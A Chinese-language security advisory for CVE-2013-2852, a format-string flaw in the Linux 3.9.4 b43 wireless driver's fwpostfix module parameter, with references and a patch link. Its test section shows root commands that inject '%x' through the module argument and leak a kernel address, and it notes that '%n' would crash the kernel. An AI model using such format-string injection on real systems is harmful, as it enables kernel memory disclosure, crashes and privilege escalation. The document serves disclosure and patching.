漏洞版本:
Linux Kernel 3.9.4
漏洞描述:
CVE ID:CVE-2013-2852Linux是一款开源的操作系统。Linux b43无线驱动存在安全问题,允许本地攻击者利用漏洞提升权限。 b43无线驱动drivers/net/wireless/b43/main.c b43_request_firmware函数可使用"fwpostfix"模块参数来更改文件名用于获取固件,如果此文件没有找到的情况下,错误消息会把文件名以格式串处理,这可导致应用程序崩溃或可以从uid-0提权到ring-0。
<* 参考
https://bugzilla.redhat.com/show_bug.cgi?id=969518*>
http://seclists.org/oss-sec/2013/q2/510
测试方法:
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- # rmmod b43
- # modprobe b43 fwpostfix=AA%xBB
- ...
- # dmesg
- ...
- b43-0 ERROR:Firmware file "b43AAdeff80ccBB/a0g1bsinitvals5.fw"not found
- Using%n instead of %x would lead to exciting crashes.:)
安全建议:
厂商解决方案用户可参考如下厂商提供的安全公告获得补丁信息: http://git.kernel.org/cgit/linux/kernel/git/linville/wireless.git/commit/?id=9538cbaab6e8b8046039b4b2eb6c9d614dc782bd
